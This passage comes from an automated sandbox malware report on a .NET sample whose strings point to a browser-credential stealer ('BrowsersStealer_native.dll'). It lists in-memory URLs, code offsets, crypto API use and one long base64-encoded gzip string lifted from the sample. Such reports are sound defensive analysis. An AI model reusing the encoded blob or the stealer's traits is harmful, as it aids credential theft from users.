                        Source: psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013468000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.000000001351C000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.00000000135D0000.00000004.00000800.00020000.00000000.sdmp, sNp1HQqzKO.5.dr, gyrFRHPWmE.5.dr, PGRCH9cfsR.5.dr, X90WcnJSth.5.dr, m1xjLE7qWQ.5.dr, u6jIpOvvif.5.dr, FmsKmnN6M1.5.dr, HHXBE8ATu5.5.dr, JJDy2zK4EH.5.dr, j2eQyIFjXv.5.dr, rcAJC5lSDO.5.dr, kJHkZzVrCU.5.dr, 1iGEox8LJK.5.dr, 6zDIcqlpAr.5.dr, rR5sWazf1y.5.dr, 4DRL9HF3xs.5.dr, Mms2F5H8gz.5.dr, cQm8PzaWBg.5.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                        Source: psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013468000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.000000001351C000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.00000000135D0000.00000004.00000800.00020000.00000000.sdmp, sNp1HQqzKO.5.dr, gyrFRHPWmE.5.dr, PGRCH9cfsR.5.dr, X90WcnJSth.5.dr, m1xjLE7qWQ.5.dr, u6jIpOvvif.5.dr, FmsKmnN6M1.5.dr, HHXBE8ATu5.5.dr, JJDy2zK4EH.5.dr, j2eQyIFjXv.5.dr, rcAJC5lSDO.5.dr, kJHkZzVrCU.5.dr, 1iGEox8LJK.5.dr, 6zDIcqlpAr.5.dr, rR5sWazf1y.5.dr, 4DRL9HF3xs.5.dr, Mms2F5H8gz.5.dr, cQm8PzaWBg.5.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                        Source: psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013468000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.000000001351C000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.00000000135D0000.00000004.00000800.00020000.00000000.sdmp, sNp1HQqzKO.5.dr, gyrFRHPWmE.5.dr, PGRCH9cfsR.5.dr, X90WcnJSth.5.dr, m1xjLE7qWQ.5.dr, u6jIpOvvif.5.dr, FmsKmnN6M1.5.dr, HHXBE8ATu5.5.dr, JJDy2zK4EH.5.dr, j2eQyIFjXv.5.dr, rcAJC5lSDO.5.dr, kJHkZzVrCU.5.dr, 1iGEox8LJK.5.dr, 6zDIcqlpAr.5.dr, rR5sWazf1y.5.dr, 4DRL9HF3xs.5.dr, Mms2F5H8gz.5.dr, cQm8PzaWBg.5.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                        Source: psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013468000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.000000001351C000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.00000000135D0000.00000004.00000800.00020000.00000000.sdmp, sNp1HQqzKO.5.dr, gyrFRHPWmE.5.dr, PGRCH9cfsR.5.dr, X90WcnJSth.5.dr, m1xjLE7qWQ.5.dr, u6jIpOvvif.5.dr, FmsKmnN6M1.5.dr, HHXBE8ATu5.5.dr, JJDy2zK4EH.5.dr, j2eQyIFjXv.5.dr, rcAJC5lSDO.5.dr, kJHkZzVrCU.5.dr, 1iGEox8LJK.5.dr, 6zDIcqlpAr.5.dr, rR5sWazf1y.5.dr, 4DRL9HF3xs.5.dr, Mms2F5H8gz.5.dr, cQm8PzaWBg.5.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                        Source: psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013468000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.000000001351C000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.00000000135D0000.00000004.00000800.00020000.00000000.sdmp, sNp1HQqzKO.5.dr, gyrFRHPWmE.5.dr, PGRCH9cfsR.5.dr, X90WcnJSth.5.dr, m1xjLE7qWQ.5.dr, u6jIpOvvif.5.dr, FmsKmnN6M1.5.dr, HHXBE8ATu5.5.dr, JJDy2zK4EH.5.dr, j2eQyIFjXv.5.dr, rcAJC5lSDO.5.dr, kJHkZzVrCU.5.dr, 1iGEox8LJK.5.dr, 6zDIcqlpAr.5.dr, rR5sWazf1y.5.dr, 4DRL9HF3xs.5.dr, Mms2F5H8gz.5.dr, cQm8PzaWBg.5.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                        Source: psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013468000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.000000001351C000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.00000000135D0000.00000004.00000800.00020000.00000000.sdmp, sNp1HQqzKO.5.dr, gyrFRHPWmE.5.dr, PGRCH9cfsR.5.dr, X90WcnJSth.5.dr, m1xjLE7qWQ.5.dr, u6jIpOvvif.5.dr, FmsKmnN6M1.5.dr, HHXBE8ATu5.5.dr, JJDy2zK4EH.5.dr, j2eQyIFjXv.5.dr, rcAJC5lSDO.5.dr, kJHkZzVrCU.5.dr, 1iGEox8LJK.5.dr, 6zDIcqlpAr.5.dr, rR5sWazf1y.5.dr, 4DRL9HF3xs.5.dr, Mms2F5H8gz.5.dr, cQm8PzaWBg.5.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                        Source: psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013468000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.000000001351C000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.00000000135D0000.00000004.00000800.00020000.00000000.sdmp, sNp1HQqzKO.5.dr, gyrFRHPWmE.5.dr, PGRCH9cfsR.5.dr, X90WcnJSth.5.dr, m1xjLE7qWQ.5.dr, u6jIpOvvif.5.dr, FmsKmnN6M1.5.dr, HHXBE8ATu5.5.dr, JJDy2zK4EH.5.dr, j2eQyIFjXv.5.dr, rcAJC5lSDO.5.dr, kJHkZzVrCU.5.dr, 1iGEox8LJK.5.dr, 6zDIcqlpAr.5.dr, rR5sWazf1y.5.dr, 4DRL9HF3xs.5.dr, Mms2F5H8gz.5.dr, cQm8PzaWBg.5.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                        Source: b8aNRiIJEo.5.drString found in binary or memory: https://support.mozilla.org
                        Source: b8aNRiIJEo.5.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                        Source: b8aNRiIJEo.5.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
                        Source: psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.000000001395D000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013C5F000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.00000000138D1000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.00000000137B9000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.00000000136A1000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.000000001388B000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013917000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013B01000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.000000001372D000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.00000000139E9000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013773000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013A75000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.00000000139A3000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013C19000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.00000000136E7000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013BD3000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013845000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013615000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013B47000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.00000000137FF000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                        Source: psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013A50000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013708000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.00000000138AC000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013B68000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013B22000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013938000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013ADC000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013794000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.00000000139C4000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013BAE000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013820000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013BF4000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013A0A000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.000000001367C000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013636000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.00000000135F0000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.000000001374E000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013866000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.000000001397E000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.00000000138F2000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.00000000137DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                        Source: psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.000000001395D000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013C5F000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.00000000138D1000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.00000000137B9000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.00000000136A1000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.000000001388B000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013917000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013B01000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.000000001372D000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.00000000139E9000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013773000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013A75000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.00000000139A3000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013C19000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.00000000136E7000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013BD3000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013845000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013615000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013B47000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.00000000137FF000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                        Source: psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013A50000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013708000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.00000000138AC000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013B68000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013B22000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013938000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013ADC000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013794000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.00000000139C4000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013BAE000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013820000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013BF4000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013A0A000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.000000001367C000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013636000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.00000000135F0000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.000000001374E000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013866000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.000000001397E000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.00000000138F2000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.00000000137DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                        Source: psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013468000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.000000001351C000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.00000000135D0000.00000004.00000800.00020000.00000000.sdmp, sNp1HQqzKO.5.dr, gyrFRHPWmE.5.dr, PGRCH9cfsR.5.dr, X90WcnJSth.5.dr, m1xjLE7qWQ.5.dr, u6jIpOvvif.5.dr, FmsKmnN6M1.5.dr, HHXBE8ATu5.5.dr, JJDy2zK4EH.5.dr, j2eQyIFjXv.5.dr, rcAJC5lSDO.5.dr, kJHkZzVrCU.5.dr, 1iGEox8LJK.5.dr, 6zDIcqlpAr.5.dr, rR5sWazf1y.5.dr, 4DRL9HF3xs.5.dr, Mms2F5H8gz.5.dr, cQm8PzaWBg.5.drString found in binary or memory: https://www.ecosia.org/newtab/
                        Source: psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013468000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.000000001351C000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.00000000135D0000.00000004.00000800.00020000.00000000.sdmp, sNp1HQqzKO.5.dr, gyrFRHPWmE.5.dr, PGRCH9cfsR.5.dr, X90WcnJSth.5.dr, m1xjLE7qWQ.5.dr, u6jIpOvvif.5.dr, FmsKmnN6M1.5.dr, HHXBE8ATu5.5.dr, JJDy2zK4EH.5.dr, j2eQyIFjXv.5.dr, rcAJC5lSDO.5.dr, kJHkZzVrCU.5.dr, 1iGEox8LJK.5.dr, 6zDIcqlpAr.5.dr, rR5sWazf1y.5.dr, 4DRL9HF3xs.5.dr, Mms2F5H8gz.5.dr, cQm8PzaWBg.5.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                        Source: b8aNRiIJEo.5.drString found in binary or memory: https://www.mozilla.org
                        Source: b8aNRiIJEo.5.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                        Source: b8aNRiIJEo.5.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                        Source: psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013C9E000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.000000001419E000.00000004.00000800.00020000.00000000.sdmp, 7aEAtRAo6i.5.dr, b8aNRiIJEo.5.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                        Source: b8aNRiIJEo.5.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                        Source: psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013C9E000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.000000001419E000.00000004.00000800.00020000.00000000.sdmp, 7aEAtRAo6i.5.dr, b8aNRiIJEo.5.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                        System Summary

                        barindex
                        .NET source code contains very large strings
                        Source: 3e88PGFfkf.exe, s67.csLong String: Length: 171760
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess Stats: CPU usage > 49%
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeCode function: 0_2_00007FFD9B8A34150_2_00007FFD9B8A3415
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeCode function: 0_2_00007FFD9B891EC30_2_00007FFD9B891EC3
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeCode function: 0_2_00007FFD9BA80EFA0_2_00007FFD9BA80EFA
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeCode function: 0_2_00007FFD9BA80DF20_2_00007FFD9BA80DF2
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeCode function: 0_2_00007FFD9BA80CF20_2_00007FFD9BA80CF2
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeCode function: 5_2_00007FFD9BAD34155_2_00007FFD9BAD3415
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeCode function: 5_2_00007FFD9BAC1EC35_2_00007FFD9BAC1EC3
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeCode function: 5_2_00007FFD9BCB3AF05_2_00007FFD9BCB3AF0
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeCode function: 5_2_00007FFD9BCB0EFA5_2_00007FFD9BCB0EFA
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeCode function: 5_2_00007FFD9BCB0DF25_2_00007FFD9BCB0DF2
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeCode function: 5_2_00007FFD9BCB0CF25_2_00007FFD9BCB0CF2
                        Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\FsgregnE.log DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                        Source: 3e88PGFfkf.exe, 00000000.00000000.1698323315.0000000000F52000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs 3e88PGFfkf.exe
                        Source: 3e88PGFfkf.exe, 00000000.00000002.1729197097.00000000135D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBrowsersStealer_native.dll" vs 3e88PGFfkf.exe
                        Source: 3e88PGFfkf.exe, 00000000.00000002.1726853892.0000000001680000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameBrowsersStealer_native.dll" vs 3e88PGFfkf.exe
                        Source: 3e88PGFfkf.exe, 00000000.00000002.1730343385.000000001CB10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs 3e88PGFfkf.exe
                        Source: 3e88PGFfkf.exe, 00000000.00000002.1730343385.000000001CB10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs 3e88PGFfkf.exe
                        Source: 3e88PGFfkf.exeBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs 3e88PGFfkf.exe
                        Source: 3e88PGFfkf.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                        Source: 3e88PGFfkf.exe, E32.csCryptographic APIs: 'TransformBlock'
                        Source: 3e88PGFfkf.exe, E32.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 3e88PGFfkf.exe, E32.csCryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
                        Source: 3e88PGFfkf.exe, s67.csBase64 encoded string: 'H4sIAAAAAAAEAAHMAzP8h9/O3TpaXy8mNjc0MTxvaGggOmp1dT8nLHcvOnktLX0xJS97QkJBGxBGRUNOCxBQDnIeDQoTZkFBUBQbGmYLGQYfUFQiKColJiApICksKyQpJSIqNj85PDA3MzE/KT0wMjNkEgUVAy4FFg07BgwACQ0BDA4bHgIfFx0aEBAcGR8dERMa5eTj6ers6+/ls8fu+OzD7uP6zv399/jy8v388fHw9e/Dz87TwcfNy8XHwcTJwsfH39fX0I7hxNjW9dPV1+HQ2a6rqq6vra6qo6ugoKesrKG0sry9u7K3sLe+uLW5uL3lso6Mioq5iIyChIWEhIGJgJuSkZyQnJWdkp+fmZqSk5NibWhkYm1tPVpmZGJiUWBpeHN9e314d3J0e3VzbHd8fUxFQU1DRkhGWEdOREhHXhVyWFxSWlZTdFBYU1VgU1xZLiAnLykqKyIhJCInPCApJT47PSM8PSY8MzY2MSw8ZA8IAAwXCwg6CQYZAhsAHQkAERoaGx4WHhwTERcSGxofFOnr7Ojs4+jjst3Fxdvo7NP+9/T99vD68fz2//Lz9fvxy8vLwcrIx8PCwM/DxsXPxdKL69zG2t/r1tjR1NXc192upLKgoaGlt6SgoKalrKOhsbi1sbGlu7S644O0rrK3g46AhIGHh4yXipmMioiBhYKYnJGfnJ6Tkpedl5qRnpiTYztPYnBtUWZkZW9/UGNmYXZwfHh6enVxfXZ8eXh5eXxJS0xOTEtASUNNREpNSRRsX1hcUVVGU2tWUFdXU1RYVCcrIyQjLSgpKyMhIysqKicxPT8wOjM9OzNjDik5JzEtMCw+DQ0JAQQGAQ8HHA4GARMUFxoEHAYeEhgWERcfEh3j7uDvvsLH8vzh1uXj6OLl9P324/r48vX78fX19fjy9sTGzcHAwcDBzsXLx5bo4fzs39HZ0dnQx9TJ1t7e2dTVpa+ur7SvpaWkpKCgqq6oqb606Jm1ra6bsbu/qaikgrGMho+Th5WBi5iHjY+DjIKNl5Sdn5CQl52empaVlJyYnjpSY2VhVWdrVGdrY2Nhfml0eHN/fnJ8cXB2d3J0dnR9TUZISkBJRUNGRhBuVEJKWkMTHhFrBxQNGnpPSU5YUEtgFDEmNmdqZRd6aHFuGTw6NXMvf3YxZ2ZtYDs4bXBsbVRST1dRAFVKUQsLD0FYWwsWRRREQ0ZEEkFbQABeIk5duqPh8f318uiz6+vl57bv+uT5/eH97/fj8fb0oP3+/fDVz9aBiIf5loqTiJqZnZ6NnJPtgZaPlIaNm5aZ446cheKVsLah57u6dH0DqMwDAAA=', 